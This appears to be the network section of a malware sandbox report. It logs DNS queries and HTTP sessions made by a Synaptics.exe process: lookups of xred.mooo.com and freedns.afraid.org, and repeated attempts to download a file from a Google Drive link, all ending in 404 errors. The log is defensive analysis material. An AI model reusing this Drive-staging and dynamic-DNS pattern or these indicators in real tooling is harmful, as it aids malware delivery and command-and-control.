                                                                                                                            Dec 30, 2024 11:24:29.037537098 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.037609100 CET49862443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.037868977 CET49862443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.037880898 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.042016983 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.042032003 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.042357922 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.042620897 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.052537918 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.066652060 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.066668034 CET44349859142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.066986084 CET44349859142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.067037106 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.067822933 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.095329046 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.115335941 CET44349859142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.360476971 CET44349859142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.360543966 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.360579014 CET44349859142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.360632896 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.360965967 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.361008883 CET44349859142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.361057997 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.361135006 CET49859443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.361946106 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.362046003 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.362344980 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.362915993 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.362936974 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402218103 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402286053 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402323008 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.402339935 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402353048 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.402384996 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.402410984 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402446985 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.402457952 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402518034 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.402559996 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.403115034 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.403139114 CET44349858172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.403151989 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.403187037 CET49858443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.403614044 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.403666019 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.403733969 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.404073954 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:29.404090881 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.595356941 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.595426083 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.595798016 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.595820904 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.598464966 CET49861443192.168.2.6142.250.186.46
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
Dec 30, 2024 11:24:22.393764973 CET  192.168.2.6  1.1.1.1  0xbf22    Standard query (0)  docs.google.com               A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:23.391835928 CET  192.168.2.6  1.1.1.1  0xd780    Standard query (0)  xred.mooo.com                 A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:23.402188063 CET  192.168.2.6  1.1.1.1  0xa546    Standard query (0)  freedns.afraid.org            A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:23.695738077 CET  192.168.2.6  1.1.1.1  0x4a2f    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:35.651874065 CET  192.168.2.6  1.1.1.1  0xedee    Standard query (0)  xred.mooo.com                 A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code      Name                          CName  Address         Type            Class        DNS over HTTPS
Dec 30, 2024 11:24:22.400484085 CET  1.1.1.1      192.168.2.6  0xbf22    No error (0)    docs.google.com               -      142.250.186.46  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:23.399132013 CET  1.1.1.1      192.168.2.6  0xd780    Name error (3)  xred.mooo.com                 none   none            A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:23.410257101 CET  1.1.1.1      192.168.2.6  0xa546    No error (0)    freedns.afraid.org            -      69.42.215.252   A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:23.702275038 CET  1.1.1.1      192.168.2.6  0x4a2f    No error (0)    drive.usercontent.google.com  -      172.217.23.97   A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:24:35.659131050 CET  1.1.1.1      192.168.2.6  0xedee    Name error (3)  xred.mooo.com                 none   none            A (IP address)  IN (0x0001)  false
• docs.google.com
• drive.usercontent.google.com
• freedns.afraid.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49796        69.42.215.252   80                5048  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 30, 2024 11:24:23.417119026 CET  154                OUT        GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
Dec 30, 2024 11:24:24.009567022 CET  243                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 30 Dec 2024 10:24:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Cache: MISS
    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1fERROR: Could not authenticate.0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49785        142.250.186.46  443               5048  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                            Bytes transferred  Direction  Data
2024-12-30 10:24:23 UTC              143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:23 UTC              1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:23 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-hPMgVM7RZXbm4JkLuaTCZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49786 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:23 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-SZqa8rDhK-i0slRwkfdTcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49802 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:24 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:24 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-oP-q_joa3P3klhU7BN2vMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49805 | 172.217.23.97 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:24 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-30 10:24:24 UTC | 1594 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC4KlaZQ4n-XKMdW1aWpbAFMRpXtf-mXTavBuLeS7kh3Xpl8Tu7eBCs4dvenupWm320k
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:24 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-Zlj0acJSHkIHNfrDRTNwgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:24:24 UTC | 1594 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 52 55 5a 30 70 30 69 54 5f 39 44 64 6d 42 70 37 71 6e 72 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LRUZ0p0iT_9DdmBp7qnr4Q">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:24:24 UTC | 58 | IN | Data Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49804 | 172.217.23.97 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:24 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-30 10:24:24 UTC | 1602 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7NffQA0sK6LlEYaFFQ7Ze0jEZ5-g3-HNlxD8dVcfnhVBVgP_ShdHb7zvTRGAe23PV3b7oa4L0
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:24 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-WqdjAfbOEyvViiWfNKNokA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:24:24 UTC | 1602 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 32 41 34 53 42 32 35 42 42 39 31 55 7a 58 73 58 61 4e 43 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l2A4SB25BB91UzXsXaNCTw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:24:24 UTC | 50 | IN | Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: is server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49803 | 142.250.186.46 | 443 | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:24:24 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:24 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-6moGVRYxMx8vVhzgVEbaPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.6 | 49813       | 142.250.186.46 | 443              | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-30 10:24:25 UTC | 143               | OUT       | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:24:25 UTC | 1314              | IN        | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:25 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-htIgSiDbYiZXAWHZFi_Skg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.6 | 49814       | 172.217.23.97  | 443              | 5048 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-30 10:24:25 UTC | 186               | OUT       | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-30 10:24:25 UTC | 1601              | IN        | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC6dn2YiMuFrEVz30xh86cgW93-3PVpCeJYuVa-n7kyBql0GKo1hFdSgyDauFKoAoV1TqsuSZjI
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:24:25 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-RyFGItg9gk3Hmp-F8ePMjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls; expires=Tue, 01-Jul-2025 10:24:25 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
